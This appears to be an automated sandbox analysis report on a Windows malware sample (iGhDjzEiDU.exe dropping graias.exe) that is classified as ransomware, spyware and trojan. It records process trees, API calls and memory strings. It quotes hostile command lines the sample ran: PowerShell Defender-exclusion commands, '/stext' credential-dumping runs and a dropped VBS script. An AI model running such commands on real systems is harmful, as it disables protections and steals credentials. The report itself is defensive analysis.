                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, GY0wQ6K1nUpCqMVFnw.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.iGhDjzEiDU.exe.4309f98.5.raw.unpack, GY0wQ6K1nUpCqMVFnw.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.iGhDjzEiDU.exe.9470000.7.raw.unpack, oirEpTQk4AEyLHDkvV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@176/88@11/6
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,38_2_004182CE
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,5_2_00416AB7
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 41_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,41_2_00410DE1
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 38_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,38_2_00418758
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,5_2_0040E219
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0041A64F FindResourceA,LoadResource,LockResource,SizeofResource,5_2_0041A64F
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00419BD4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_00419BD4
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\iGhDjzEiDU.exe.logJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3752:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7196:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-O844B9
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogwhplav.jo4.ps1Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs"
                Source: iGhDjzEiDU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: iGhDjzEiDU.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSystem information queried: HandleInformation
                Source: C:\Windows\SysWOW64\dxdiag.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: graias.exe, graias.exe, 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: graias.exe, graias.exe, 00000027.00000002.2092543651.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: graias.exe, 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: graias.exe, graias.exe, 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: graias.exe, graias.exe, 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: graias.exe, graias.exe, 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: graias.exe, 00000026.00000002.2107861434.0000000002ABF000.00000004.00000020.00020000.00000000.sdmp, chpC949.tmp.38.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: graias.exe, graias.exe, 00000026.00000002.2104616476.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: iGhDjzEiDU.exeReversingLabs: Detection: 71%
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeFile read: C:\Users\user\Desktop\iGhDjzEiDU.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                Source: unknownProcess created: C:\Users\user\Desktop\iGhDjzEiDU.exe "C:\Users\user\Desktop\iGhDjzEiDU.exe"
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess created: C:\Users\user\Desktop\iGhDjzEiDU.exe "C:\Users\user\Desktop\iGhDjzEiDU.exe"
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess created: C:\Users\user\Desktop\iGhDjzEiDU.exe "C:\Users\user\Desktop\iGhDjzEiDU.exe"
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2088 --field-trial-handle=2000,i,13104816673025473941,13422850102401617178,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2052,i,5101334319077942357,3031038982098258924,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1748 --field-trial-handle=2016,i,6952115490064793543,9344193390170368015,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,6037255309931644860,773684642686352873,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1988,i,6741851451867710431,3176181943120798108,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1984,i,6477219484691926715,17097649623628388741,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1908 --field-trial-handle=1956,i,397094272896585161,9213667926170046926,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1984,i,15953286615006375795,524760772625708092,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\orbocvcopxyxxqzovbukeapdendakrxtoq"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon"
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1896,i,8025100827868505226,8846340673771724363,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1164 --field-trial-handle=1988,i,14003735333465884459,4249736709750483152,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1996,i,9861328130371480487,5472941936562496665,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 --field-trial-handle=1980,i,14451717029141036046,9817444519185968189,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 --field-trial-handle=1980,i,13194812879482372137,17589311234174251836,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=1980,i,4041789208375361090,5104077722080206453,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1900,i,964775095578921725,9120990377794690672,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs"
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe"Jump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess created: C:\Users\user\Desktop\iGhDjzEiDU.exe "C:\Users\user\Desktop\iGhDjzEiDU.exe"Jump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess created: C:\Users\user\Desktop\iGhDjzEiDU.exe "C:\Users\user\Desktop\iGhDjzEiDU.exe"Jump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\orbocvcopxyxxqzovbukeapdendakrxtoq"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs"
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
